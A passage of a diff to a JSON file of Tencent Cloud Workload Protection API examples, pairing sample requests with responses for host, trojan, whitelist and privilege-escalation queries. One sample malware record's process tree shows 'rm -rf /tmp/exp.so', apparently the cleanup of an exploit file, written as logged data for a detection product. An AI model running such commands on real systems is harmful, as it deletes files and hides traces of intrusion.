}\n ],\n \"IsAddedOnTheFifteen\": 1,\n \"IpList\": \"1.2.3.4\",\n \"VpcId\": \"vpc-intc\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"49.233.15.7\",\n \"PrivateIP\": \"172.18.16.41\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc-9m7rhl6w\",\n \"InstanceID\": \"ins-7m0suost\",\n \"HostName\": \"txy-app-pre-node1\"\n },\n \"InstanceId\": \"vpc-intc\",\n \"Remark\": \"remark\"\n }\n ],\n \"TotalCount\": 1,\n \"RequestId\": \"fbd6ea2c-1894-47b0-bf3e-095c78138f76\"\n }\n}",
|
1866
1838
|
"title": "获取区域主机列表"
|
1867
1839
|
}
|
1868
1840
|
],
|
@@ -1871,7 +1843,7 @@
|
|
1871
1843
|
"document": "",
|
1872
1844
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeMachineOsList\n<公共请求参数>\n\n{}",
|
1873
1845
|
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Name\": \"Linux\",\n \"MachineOSType\": 1\n }\n ],\n \"RequestId\": \"ec6c0e16-465e-4d40-8926-823b26bd6b8s\"\n }\n}",
|
1874
|
-
"title": "
|
1846
|
+
"title": "获取机器操作系统列表"
|
1875
1847
|
}
|
1876
1848
|
],
|
1877
1849
|
"DescribeMachineRegionList": [
|
@@ -1910,7 +1882,7 @@
|
|
1910
1882
|
{
|
1911
1883
|
"document": "本接口 (DescribeMachines) 用于获取区域主机列表。",
|
1912
1884
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeMachines\n<公共请求参数>\n\n{\n \"Limit\": 10,\n \"MachineRegion\": \"ap-shanghai\",\n \"MachineType\": \"CVM\",\n \"Filters\": [\n {\n \"Values\": [\n \"10.0.1.1\"\n ],\n \"Name\": \"Keywords\"\n }\n ],\n \"Offset\": 0\n}",
|
1913
|
-
"output": "{\n \"Response\": {\n \"Machines\": [\n {\n \"
|
1885
|
+
"output": "{\n \"Response\": {\n \"Machines\": [\n {\n \"BaselineNum\": 0,\n \"CloudTags\": [\n {\n \"TagKey\": \"Department\",\n \"TagValue\": \"dev\"\n }\n ],\n \"CyberAttackNum\": 0,\n \"HasAssetScan\": 0,\n \"InstanceId\": \"ins-111\",\n \"InstanceState\": \"NORMAL\",\n \"InvasionNum\": 3,\n \"IpList\": \"1.1.1.1\",\n \"IsAddedOnTheFifteen\": 1,\n \"IsProVersion\": false,\n \"KernelVersion\": \"3.10.0-1160.88.1.el7.x86_64\",\n \"LicenseStatus\": 0,\n \"MachineExtraInfo\": {\n \"HostName\": \"demo-instance\",\n \"InstanceID\": \"ins-111\",\n \"NetworkName\": \"vpc-111\",\n \"NetworkType\": 1,\n \"PrivateIP\": \"1.1.1.1\",\n \"WanIP\": \"1.1.1.1\"\n },\n \"MachineIp\": \"1.1.1.1\",\n \"MachineName\": \"name01\",\n \"MachineOs\": \"CentOS 7.6 64位\",\n \"MachineStatus\": \"ONLINE\",\n \"MachineType\": \"CVM\",\n \"MachineWanIp\": \"1.1.1.1\",\n \"MalwareNum\": 0,\n \"PayMode\": \"POSTPAY\",\n \"ProjectId\": 0,\n \"ProtectType\": \"BASIC_VERSION\",\n \"Quuid\": \"3377add2-ee61-4c9a-99a3-************\",\n \"RegionInfo\": {\n \"Region\": \"ap-nanjing\",\n \"RegionCode\": \"nj\",\n \"RegionId\": 33,\n \"RegionName\": \"华东地区(南京)\",\n \"RegionNameEn\": \"East China (Nanjing)\"\n },\n \"Remark\": \"do not remove\",\n \"SecurityStatus\": \"RISK\",\n \"Tag\": [\n {\n \"Rid\": 1001,\n \"Name\": \"cwp\",\n \"TagId\": 1022\n }\n ],\n \"Uuid\": \"3377add2-ee61-4c9a-99a3-************\",\n \"VpcId\": \"vpc-1dj4***\",\n \"VulNum\": 0\n }\n ],\n \"RequestId\": \"621b6063-12b2-43fa-809e-************\",\n \"TotalCount\": 192\n }\n}",
|
1914
1886
|
"title": "获取区域主机列表"
|
1915
1887
|
}
|
1916
1888
|
],
|
@@ -1918,7 +1890,7 @@
|
|
1918
1890
|
{
|
1919
1891
|
"document": "本接口 (DescribeMachinesSimple) 用于获取区域主机列表。",
|
1920
1892
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeMachinesSimple\n<公共请求参数>\n\n{\n \"Limit\": \"10\",\n \"MachineRegion\": \"ap-shanghai\",\n \"MachineType\": \"CVM\",\n \"Filters\": [\n {\n \"Values\": [\n \"10.0.1.1\"\n ],\n \"Name\": \"Keywords\"\n }\n ],\n \"Offset\": \"0\"\n}",
|
1921
|
-
"output": "{\n \"Response\": {\n \"Machines\": [\n {\n \"MachineName\": \"test-name\",\n \"MachineOs\": \"
|
1893
|
+
"output": "{\n \"Response\": {\n \"Machines\": [\n {\n \"MachineName\": \"test-name\",\n \"MachineOs\": \"Windows Server 2022 数据中心版 64位 中文版\",\n \"Uuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"Quuid\": \"24c9be55-c743-4a75-a5c7-2a2912341234\",\n \"MachineIp\": \"10.0.0.11\",\n \"IsProVersion\": true,\n \"MachineWanIp\": \"110.84.0.11\",\n \"PayMode\": \"PREPAY\",\n \"Tag\": [\n {\n \"Rid\": 0,\n \"Name\": \"test-name\",\n \"TagId\": 1\n }\n ],\n \"RegionInfo\": {\n \"Region\": \"ap-guangzhou\",\n \"RegionName\": \"test-name\",\n \"RegionId\": 1,\n \"RegionCode\": \"gz\",\n \"RegionNameEn\": \"test-name\"\n },\n \"InstanceState\": \"EXPIRED\",\n \"ProjectId\": 0,\n \"MachineType\": \"CVM\",\n \"KernelVersion\": \"0.1.1\",\n \"ProtectType\": \"BASIC_VERSION\",\n \"LicenseOrder\": {\n \"LicenseId\": 1,\n \"LicenseType\": 1,\n \"Status\": 1,\n \"SourceType\": 1,\n \"ResourceId\": \"uf6iskfrpy4g3xg2k1jm\"\n },\n \"CloudTags\": [],\n \"InstanceId\": \"i-uf6iskfrpy4g3xg2k1jm\"\n }\n ],\n \"TotalCount\": 1,\n \"RequestId\": \"37b6df34-68f1-4ab8-a3d8-7b89de604c82\"\n }\n}",
|
1922
1894
|
"title": "获取区域主机列表"
|
1923
1895
|
}
|
1924
1896
|
],
|
@@ -1926,7 +1898,7 @@
|
|
1926
1898
|
{
|
1927
1899
|
"document": "获取木马列表",
|
1928
1900
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeMalWareList\n<公共请求参数>\n\n{}",
|
1929
|
-
"output": "{\n \"Response\": {\n \"MalWareList\": [\n {\n \"Alias\": \"v_aaa\",\n \"CheckPlatform\": \"1,2\",\n \"CreateTime\": \"2023-12-22 16:25:44\",\n \"FileCreateTime\": \"\",\n \"FileExists\": 1,\n \"FileModifierTime\": \"\",\n \"FilePath\": \"/root/aaa/061d0056bc2a3af43051b88a7ca30555\",\n \"HostIp\": \"172.16.16.10\",\n \"Id\": 160250,\n \"LatestScanTime\": \"2023-12-25 16:34:50\",\n \"Level\": 4,\n \"MD5\": \"061d0056bc2a3af43051b88a7ca30555\",\n \"MachineExtraInfo\": {\n \"HostName\": \"
|
1901
|
+
"output": "{\n \"Response\": {\n \"MalWareList\": [\n {\n \"Alias\": \"v_aaa\",\n \"CheckPlatform\": \"1,2\",\n \"CreateTime\": \"2023-12-22 16:25:44\",\n \"FileCreateTime\": \"2020-11-21 15:16:00\",\n \"FileExists\": 1,\n \"FileModifierTime\": \"2020-11-21 15:16:00\",\n \"FilePath\": \"/root/aaa/061d0056bc2a3af43051b88a7ca30555\",\n \"HostIp\": \"172.16.16.10\",\n \"Id\": 160250,\n \"LatestScanTime\": \"2023-12-25 16:34:50\",\n \"Level\": 4,\n \"MD5\": \"061d0056bc2a3af43051b88a7ca30555\",\n \"MachineExtraInfo\": {\n \"HostName\": \"hn***\",\n \"InstanceID\": \"ins-aaaa\",\n \"NetworkName\": \"vpc-d7f***\",\n \"NetworkType\": 0,\n \"PrivateIP\": \"172.16.16.10\",\n \"WanIP\": \"172.16.16.10\"\n },\n \"ProcessExists\": 0,\n \"Quuid\": \"aaaaa-8c8d-4077-9acc-80ce542a6937\",\n \"Status\": 4,\n \"Tags\": [],\n \"Uuid\": \"aaaaa-8c8d-4077-9acc-80ce542a6937\",\n \"VirusName\": \"Win32.Trojan.Kryptik.Jmnw\"\n }\n ],\n \"RequestId\": \"8a201811-8d1c-4545-b6b9-63be9b6ccafc\",\n \"TotalCount\": 21780\n }\n}",
|
1930
1902
|
"title": "获取木马列表"
|
1931
1903
|
}
|
1932
1904
|
],
|
@@ -1950,7 +1922,7 @@
|
|
1950
1922
|
{
|
1951
1923
|
"document": "",
|
1952
1924
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribeMalwareInfo\n&Id=10000\n&<公共请求参数>",
|
1953
|
-
"output": "{\n \"Response\": {\n \"MalwareInfo\": {\n \"VirusName\": \"name1\",\n \"FileSize\": 10,\n \"MD5\": \"87f70257f93a96273664ea5ef842c2c3\",\n \"FilePath\": \"/data/path1\",\n \"FileCreateTime\": \"2020-10-01 01:02:03\",\n \"FileModifierTime\": \"2020-10-01 02:02:03\",\n \"HarmDescribe\": \"desc1\",\n \"SuggestScheme\": \"suggest1\",\n \"ServersName\": \"srv1\",\n \"HostIp\": \"172.16.20.1\",\n \"ProcessName\": \"prcess1\",\n \"ProcessID\": \"
|
1925
|
+
"output": "{\n \"Response\": {\n \"MalwareInfo\": {\n \"VirusName\": \"name1\",\n \"FileSize\": 10,\n \"MD5\": \"87f70257f93a96273664ea5ef842c2c3\",\n \"FilePath\": \"/data/path1\",\n \"FileCreateTime\": \"2020-10-01 01:02:03\",\n \"FileModifierTime\": \"2020-10-01 02:02:03\",\n \"HarmDescribe\": \"desc1\",\n \"SuggestScheme\": \"suggest1\",\n \"ServersName\": \"srv1\",\n \"HostIp\": \"172.16.20.1\",\n \"ProcessName\": \"prcess1\",\n \"ProcessID\": \"14245\",\n \"Tags\": [\n \"tag1\"\n ],\n \"Breadth\": \"10\",\n \"Heat\": \"80\",\n \"Id\": 1,\n \"FileName\": \"/data/file1\",\n \"CreateTime\": \"2020-10-01 00:02:03\",\n \"LatestScanTime\": \"2020-10-02 00:02:03\",\n \"Reference\": \"ref1\",\n \"MachineWanIp\": \"14.13.12.1\",\n \"PsTree\": \"[{\\\"pid\\\":6109,\\\"exe\\\":\\\"/bin/busybox\\\",\\\"cmdline\\\":\\\"rm -rf /tmp/exp.so\\\",\\\"account\\\":\\\"polkitd:lighthouse\\\",\\\"start_time\\\":1699012235,\\\"exe_perm\\\":\\\"-rwxr-xr-x\\\",\\\"exe_mtime\\\":1576692277,\\\"sessionid\\\":306****\",\n \"MachineStatus\": \"ONLINE\",\n \"Status\": 1,\n \"Level\": 1,\n \"CheckPlatform\": \"platform1\",\n \"Uuid\": \"6cf3c132-aaa-bbbb-b08d-98be9421372a\",\n \"ModifyTime\": \"2020-10-01 00:02:03\",\n \"StrFileAccessTime\": \"2020-10-01 00:02:03\",\n \"MachineExtraInfo\": {\n \"WanIP\": \"14.13.12.1\",\n \"PrivateIP\": \"172.16.20.1\",\n \"NetworkType\": 0,\n \"NetworkName\": \"vpc\",\n \"InstanceID\": \"ins-iv1kdw\",\n \"HostName\": \"host1\"\n },\n \"References\": [\n \"ref1\"\n ]\n },\n \"RequestId\": \"8564b09e-0e04-4516-bb59-db09742503c2\"\n }\n}",
|
1954
1926
|
"title": "查看恶意文件详情"
|
1955
1927
|
}
|
1956
1928
|
],
|
@@ -1966,7 +1938,7 @@
|
|
1966
1938
|
{
|
1967
1939
|
"document": "",
|
1968
1940
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeMalwareRiskWarning\n<公共请求参数>\n\n{}",
|
1969
|
-
"output": "{\n \"Response\": {\n \"IsCheckRisk\": true,\n \"List\": [\n {\n \"MachineIp\": \"
|
1941
|
+
"output": "{\n \"Response\": {\n \"IsCheckRisk\": true,\n \"List\": [\n {\n \"MachineIp\": \"1.1.1.1\",\n \"VirusName\": \"virus1\",\n \"CreateTime\": \"2020-10-01 00:01:02\",\n \"Id\": 1\n }\n ],\n \"IsPop\": true,\n \"ProcessList\": [\n {\n \"MachineIp\": \"1.1.1.2\",\n \"VirusName\": \"virus2\",\n \"CreateTime\": \"2020-10-02 00:01:03\",\n \"Id\": 1\n }\n ],\n \"RequestId\": \"8564b09e-0e04-4516-bb59-db09742503c2\"\n }\n}",
|
1970
1942
|
"title": "风险预警提示"
|
1971
1943
|
}
|
1972
1944
|
],
|
@@ -1982,7 +1954,7 @@
|
|
1982
1954
|
{
|
1983
1955
|
"document": "",
|
1984
1956
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeMalwareWhiteList\n<公共请求参数>\n\n{\n \"Limit\": \"10\",\n \"Offset\": \"0\"\n}",
|
1985
|
-
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"WhiteList\": [\n {\n \"Id\": 1,\n \"QuuidList\": \"6cf3c132-aaa-bbbb-b08d-98be9421372a\",\n \"Md5List\": \"87f70257f93a96273664ea5ef842c2c3\",\n \"IsGlobal\": 1,\n \"Mode\": 1,\n \"MatchType\": 1,\n \"FileName\": \"/data/file1\",\n \"FileDirectory\": \"/data\",\n \"FileExtension\": \"
|
1957
|
+
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"WhiteList\": [\n {\n \"Id\": 1,\n \"QuuidList\": \"6cf3c132-aaa-bbbb-b08d-98be9421372a\",\n \"Md5List\": \"87f70257f93a96273664ea5ef842c2c3\",\n \"IsGlobal\": 1,\n \"Mode\": 1,\n \"MatchType\": 1,\n \"FileName\": \"/data/file1\",\n \"FileDirectory\": \"/data\",\n \"FileExtension\": \"php\",\n \"CreateTime\": \"2020-10-01 00:01:02\",\n \"EventsCount\": 1,\n \"ModifyTime\": \"2020-10-01 00:01:02\"\n }\n ],\n \"RequestId\": \"d73d4495-1895-43a8-95be-f447b02e253d\"\n }\n}",
|
1986
1958
|
"title": "获取木马白名单列表"
|
1987
1959
|
}
|
1988
1960
|
],
|
@@ -2014,7 +1986,7 @@
|
|
2014
1986
|
{
|
2015
1987
|
"document": "获取网络攻击白名单列表",
|
2016
1988
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeNetAttackWhiteList\n<公共请求参数>\n\n{}",
|
2017
|
-
"output": "{\n \"Response\": {\n \"RequestId\": \"c0a212e9-c598-4a2b-889f-5bc305f2e39f\",\n \"TotalCount\": 1,\n \"WhiteList\": [\n {\n \"CreateTime\": \"2023-05-22 18:38:24\",\n \"DealOldEvents\": 0,\n \"Description\": \"\",\n \"Id\": 10001,\n \"ModifyTime\": \"2023-05-22 18:43:16\",\n \"Quuids\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Scope\": 0,\n \"SrcIP\": \"1.2.3.4;1.1.1.2-1.1.1.4;1.2.3.0/24\"\n }\n ]\n }\n}",
|
1989
|
+
"output": "{\n \"Response\": {\n \"RequestId\": \"c0a212e9-c598-4a2b-889f-5bc305f2e39f\",\n \"TotalCount\": 1,\n \"WhiteList\": [\n {\n \"CreateTime\": \"2023-05-22 18:38:24\",\n \"DealOldEvents\": 0,\n \"Description\": \"idesc\",\n \"Id\": 10001,\n \"ModifyTime\": \"2023-05-22 18:43:16\",\n \"Quuids\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Scope\": 0,\n \"SrcIP\": \"1.2.3.4;1.1.1.2-1.1.1.4;1.2.3.0/24\"\n }\n ]\n }\n}",
|
2018
1990
|
"title": "获取网络攻击白名单列表"
|
2019
1991
|
}
|
2020
1992
|
],
|
@@ -2038,7 +2010,7 @@
|
|
2038
2010
|
{
|
2039
2011
|
"document": "",
|
2040
2012
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribePrivilegeEventInfo\n<公共请求参数>\n\n{\n \"Id\": 12\n}",
|
2041
|
-
"output": "{\n \"Response\": {\n \"PrivilegeEventInfo\": {\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"UserName\": \"root\",\n \"UserGroup\": \"1000\",\n \"ProcessName\": \"privilege\",\n \"CmdLine\": \"./privilege\",\n \"ParentProcName\": \"bash\",\n \"ParentProcUser\": \"1000\",\n \"CreateTime\": \"2024-09-06 14:17:45\",\n \"Status\": 0,\n \"FullPath\": \"/tmp/privilege\",\n \"ParentProcGroup\": \"1000\",\n \"ParentProcPath\": \"/usr/bin/bash\",\n \"PsTree\": \"[]\",\n \"NewCaps\": \"SYS_RAWIO|DAC_OVERRIDE|DAC_READ_SEARCH|FOWNER|FSETID|KILL|SETGID|SETUID|SETPCAP|LINUX_IMMUTABLE|NET_BIND_SERVICE|NET_BROADCAST|NET_ADMIN|NET_RAW|IPC_LOCK|IPC_OWNER|SYS_MODULE|CHOWN|BLOCK_SUSPEND|WAKE_ALARM|SYSLOG|MAC_ADMIN|MAC_OVERRIDE|SETFCAP|AUDIT_CONTROL|AUDIT_WRITE|LEASE|MKNOD|SYS_TTY_CONFIG|SYS_TIME|SYS_RESOURCE|SYS_NICE|SYS_BOOT|SYS_ADMIN|SYS_PACCT|SYS_PTRACE|SYS_CHROOT\",\n \"ModifyTime\": \"2024-09-06 14:17:45\",\n \"MachineName\": \"机器名称\",\n \"ProcFilePrivilege\": \"-rwsr-xr-x\",\n \"HostIp\": \"1.1.1.1\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Id\": 10001,\n \"MachineWanIp\": \"1.1.1.1\",\n \"SuggestScheme\": \"1、检查系统是否被添加新用户,或者存在异常权限用户;\\n2、检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n3.隔离或者删除相关的木马文件;\\n4.对系统进行风险排查,并进行安全加固,详情可参考如下链接:xa0\\n【Linux】https://cloud.tencent.com/document/product/296/9604xa0\\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"HarmDescribe\": \"黑客在入侵服务器后,为了进行下一步的恶意操作,会通过特定漏洞提升用户权限,或者直接获取root用户权限。\",\n \"Tags\": [],\n \"References\": [],\n \"MachineStatus\": \"ONLINE\"\n },\n \"RequestId\": \"f7f4d0bc-171d-491e-b97b-5c9bcb5a52a0\"\n }\n}",
|
2013
|
+
"output": "{\n \"Response\": {\n \"PrivilegeEventInfo\": {\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"UserName\": \"root\",\n \"UserGroup\": \"1000\",\n \"ProcessName\": \"privilege\",\n \"CmdLine\": \"./privilege\",\n \"ParentProcName\": \"bash\",\n \"ParentProcUser\": \"1000\",\n \"CreateTime\": \"2024-09-06 14:17:45\",\n \"Status\": 0,\n \"FullPath\": \"/tmp/privilege\",\n \"ParentProcGroup\": \"1000\",\n \"ParentProcPath\": \"/usr/bin/bash\",\n \"PsTree\": \"[{\\\"pid\\\":32528,\\\"exe\\\":\\\"/tmp/a.out\\\",\\\"account\\\":\\\"root:1002\\\",\\\"cmdline\\\":\\\"/tmp/a.out\\\",\\\"ssh_service\\\":\\\"172.16.49.104:22\\\",\\\"ssh_source\\\":\\\"113.108.77.53:12753\\\",\\\"start_time\\\":1715655696}]\",\n \"NewCaps\": \"SYS_RAWIO|DAC_OVERRIDE|DAC_READ_SEARCH|FOWNER|FSETID|KILL|SETGID|SETUID|SETPCAP|LINUX_IMMUTABLE|NET_BIND_SERVICE|NET_BROADCAST|NET_ADMIN|NET_RAW|IPC_LOCK|IPC_OWNER|SYS_MODULE|CHOWN|BLOCK_SUSPEND|WAKE_ALARM|SYSLOG|MAC_ADMIN|MAC_OVERRIDE|SETFCAP|AUDIT_CONTROL|AUDIT_WRITE|LEASE|MKNOD|SYS_TTY_CONFIG|SYS_TIME|SYS_RESOURCE|SYS_NICE|SYS_BOOT|SYS_ADMIN|SYS_PACCT|SYS_PTRACE|SYS_CHROOT\",\n \"ModifyTime\": \"2024-09-06 14:17:45\",\n \"MachineName\": \"机器名称\",\n \"ProcFilePrivilege\": \"-rwsr-xr-x\",\n \"HostIp\": \"1.1.1.1\",\n \"Quuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"Id\": 10001,\n \"MachineWanIp\": \"1.1.1.1\",\n \"SuggestScheme\": \"1、检查系统是否被添加新用户,或者存在异常权限用户;\\n2、检查恶意进程及非法端口,删除可疑的启动项和定时任务;\\n3.隔离或者删除相关的木马文件;\\n4.对系统进行风险排查,并进行安全加固,详情可参考如下链接:xa0\\n【Linux】https://cloud.tencent.com/document/product/296/9604xa0\\n【Windows】https://cloud.tencent.com/document/product/296/9605\",\n \"HarmDescribe\": \"黑客在入侵服务器后,为了进行下一步的恶意操作,会通过特定漏洞提升用户权限,或者直接获取root用户权限。\",\n \"Tags\": [],\n \"References\": [],\n \"MachineStatus\": \"ONLINE\"\n },\n \"RequestId\": \"f7f4d0bc-171d-491e-b97b-5c9bcb5a52a0\"\n }\n}",
|
2042
2014
|
"title": "查询本地提权详情"
|
2043
2015
|
}
|
2044
2016
|
],
|
@@ -2046,7 +2018,7 @@
|
|
2046
2018
|
{
|
2047
2019
|
"document": "获取本地提权事件列表",
|
2048
2020
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribePrivilegeEvents\n&<公共请求参数>",
|
2049
|
-
"output": "{\n \"Response\": {\n \"TotalCount\": 22,\n \"List\": [\n {\n \"Id\": 22,\n \"Uuid\": \"cf59e3c0-b1cc-11e9-baac-525400ca96ee\",\n \"Quuid\": \"b9821ff5-75f0-4939-b21f-13c8d36a725c\",\n \"Hostip\": \"10.0.0.125\",\n \"ProcessName\": \"
|
2021
|
+
"output": "{\n \"Response\": {\n \"TotalCount\": 22,\n \"List\": [\n {\n \"Pid\": 1,\n \"MachineExtraInfo\": {\n \"HostName\": \"demo-instance\",\n \"InstanceID\": \"ins-1002\",\n \"NetworkName\": \"vpc-1002\",\n \"NetworkType\": 1,\n \"PrivateIP\": \"1.1.1.1\",\n \"WanIP\": \"1.1.1.1\"\n },\n \"Id\": 22,\n \"Uuid\": \"cf59e3c0-b1cc-11e9-baac-525400ca96ee\",\n \"Quuid\": \"b9821ff5-75f0-4939-b21f-13c8d36a725c\",\n \"Hostip\": \"10.0.0.125\",\n \"ProcessName\": \"nginx\",\n \"FullPath\": \"/home/ubuntu/a\",\n \"CmdLine\": \"./a \",\n \"UserName\": \"root\",\n \"UserGroup\": \"ubuntu\",\n \"ProcFilePrivilege\": \"-rwsr-xr-x\",\n \"ParentProcName\": \"bash\",\n \"ParentProcUser\": \"ubuntu\",\n \"ParentProcGroup\": \"ubuntu\",\n \"ParentProcPath\": \"/bin/bash\",\n \"ProcTree\": \"a(root),bash(ubuntu),sshd(ubuntu),sshd(root),sshd(root),init(root)\",\n \"Status\": 0,\n \"CreateTime\": \"2019-08-15 15:27:52\",\n \"MachineName\": \"测试机_Linux_4_weikunlin\"\n }\n ],\n \"RequestId\": \"bd9aa8c8-36b6-4991-8e42-d08e80313616\"\n }\n}",
|
2050
2022
|
"title": "获取本地提权事件列表"
|
2051
2023
|
}
|
2052
2024
|
],
|
@@ -2054,7 +2026,7 @@
|
|
2054
2026
|
{
|
2055
2027
|
"document": "获取本地提权规则列表",
|
2056
2028
|
"input": "https://cwp.tencentcloudapi.com/?Action=DescribePrivilegeRules\n&<公共请求参数>",
|
2057
|
-
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\": 10001,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"ProcessName\": \"privilege\",\n \"SMode\": 1,\n \"Operator\": \"\",\n \"Status\": 0,\n \"IsGlobal\": 0,\n \"CreateTime\": \"2024-08-23 17:13:47\",\n \"ModifyTime\": \"2024-08-23 17:13:47\",\n \"Hostip\": \"1.1.1.1\"\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
|
2029
|
+
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"Id\": 10001,\n \"Uuid\": \"05f0bcab-726c-4ea4-8109-bcd03d5598f7\",\n \"ProcessName\": \"privilege\",\n \"SMode\": 1,\n \"Operator\": \"zhangsan\",\n \"Status\": 0,\n \"IsGlobal\": 0,\n \"CreateTime\": \"2024-08-23 17:13:47\",\n \"ModifyTime\": \"2024-08-23 17:13:47\",\n \"Hostip\": \"1.1.1.1\"\n }\n ],\n \"RequestId\": \"be6f6eec-0825-4e67-ab9a-c8568bbf736c\"\n }\n}",
|
2058
2030
|
"title": "获取本地提权规则列表"
|
2059
2031
|
}
|
2060
2032
|
],
|
@@ -2086,23 +2058,23 @@
|
|
2086
2058
|
{
|
2087
2059
|
"document": "产品试用状态查询接口",
|
2088
2060
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeProductStatus\n<公共请求参数>\n\n{}",
|
2089
|
-
"output": "{\n \"Response\": {\n \"ReturnCode\": 1,\n \"ReturnMsg\": \"msg\",\n \"Data\": {\n \"FWUserStatus\": 1,\n \"CanApplyTrial\": true,\n \"CanNotApplyReason\": \"reason\",\n \"LastTrialTime\": \" 2019-12-25 11:57:15\"\n },\n \"RequestId\": \"
|
2061
|
+
"output": "{\n \"Response\": {\n \"ReturnCode\": 1,\n \"ReturnMsg\": \"msg\",\n \"Data\": {\n \"FWUserStatus\": 1,\n \"CanApplyTrial\": true,\n \"CanNotApplyReason\": \"reason\",\n \"LastTrialTime\": \" 2019-12-25 11:57:15\"\n },\n \"RequestId\": \"acdd5474-6360-4fd4-bfc7-843162cb8116\"\n }\n}",
|
2090
2062
|
"title": "示例"
|
2091
2063
|
}
|
2092
2064
|
],
|
2093
2065
|
"DescribeProtectDirList": [
|
2094
2066
|
{
|
2095
|
-
"document": "
|
2067
|
+
"document": "",
|
2096
2068
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeProtectDirList\n<公共请求参数>\n\n{\n \"Limit\": 1,\n \"Offset\": 1\n}",
|
2097
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"
|
2098
|
-
"title": "
|
2069
|
+
"output": "{\n \"Response\": {\n \"TotalCount\": 1,\n \"List\": [\n {\n \"DirName\": \"sdfdsf\",\n \"DirPath\": \"/home/te****\",\n \"RelatedServerNum\": 1,\n \"ProtectServerNum\": 1,\n \"NoProtectServerNum\": 1,\n \"Id\": \"/home/te****\",\n \"ProtectStatus\": 1,\n \"ProtectException\": 1,\n \"AutoRestoreSwitchStatus\": 1,\n \"FirstProtectTime\": \"2020-11-21 15:16:00\",\n \"LatestProtectTime\": \"2020-11-21 15:16:00\",\n \"ProtectFileType\": \".php;.js\",\n \"ProtectFilesCount\": 0\n }\n ],\n \"RequestId\": \"2eedad67-5a4c-4746-82d2-52a8e5d91c6a\"\n }\n}",
|
2070
|
+
"title": "查询网页防篡改防护目录列表"
|
2099
2071
|
}
|
2100
2072
|
],
|
2101
2073
|
"DescribeProtectDirRelatedServer": [
|
2102
2074
|
{
|
2103
2075
|
"document": "",
|
2104
2076
|
"input": "POST / HTTP/1.1\nHost: cwp.tencentcloudapi.com\nContent-Type: application/json\nX-TC-Action: DescribeProtectDirRelatedServer\n<公共请求参数>\n\n{\n \"Id\": \"/tmp\",\n \"Limit\": 10,\n \"Offset\": 0\n}",
|
2105
|
-
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"Id\": \"/temp\",\n \"AutoRestoreSwitchStatus\": 1,\n \"HostName\": \"目录名称1\",\n \"HostIp\": \"10.0.0.1\",\n \"MachineOs\": \"Linux\",\n \"RelateDirNum\": 1,\n \"ProtectSwitch\": 1,\n \"ProtectStatus\": 1,\n \"Quuid\": \"服务器唯一ID\",\n \"Authorization\": true,\n \"Exception\": 0,\n \"Progress\": 10,\n \"ExceptionMessage\": \"启动中\"\n }\n ],\n \"RequestId\": \"7eb47586-e1e9-40eb-a3e1-bc73cf1e475f\",\n \"TotalCount\": 1,\n \"ProtectServerCount\": 1\n }\n}",
|
2077
|
+
"output": "{\n \"Response\": {\n \"List\": [\n {\n \"MachineExtraInfo\": {\n \"HostName\": \"demo-instance\",\n \"InstanceID\": \"ins-1002\",\n \"NetworkName\": \"vpc-1002\",\n \"NetworkType\": 1,\n \"PrivateIP\": \"1.1.1.1\",\n \"WanIP\": \"1.1.1.1\"\n },\n \"Id\": \"/temp\",\n \"AutoRestoreSwitchStatus\": 1,\n \"HostName\": \"目录名称1\",\n \"HostIp\": \"10.0.0.1\",\n \"MachineOs\": \"Linux\",\n \"RelateDirNum\": 1,\n \"ProtectSwitch\": 1,\n \"ProtectStatus\": 1,\n \"Quuid\": \"服务器唯一ID\",\n \"Authorization\": true,\n \"Exception\": 0,\n \"Progress\": 10,\n \"ExceptionMessage\": \"启动中\"\n }\n ],\n \"RequestId\": \"7eb47586-e1e9-40eb-a3e1-bc73cf1e475f\",\n \"TotalCount\": 1,\n \"ProtectServerCount\": 1\n }\n}",
|
2106
2078
|
"title": "示例"
|
2107
2079
|
}
|
2108
2080
|
],
|
@@ -2110,7 +2082,7 @@
|
|
2110
2082
|
{
|
2111
2083
|
"document": "专家服务-旗舰重保列表",
|
2112
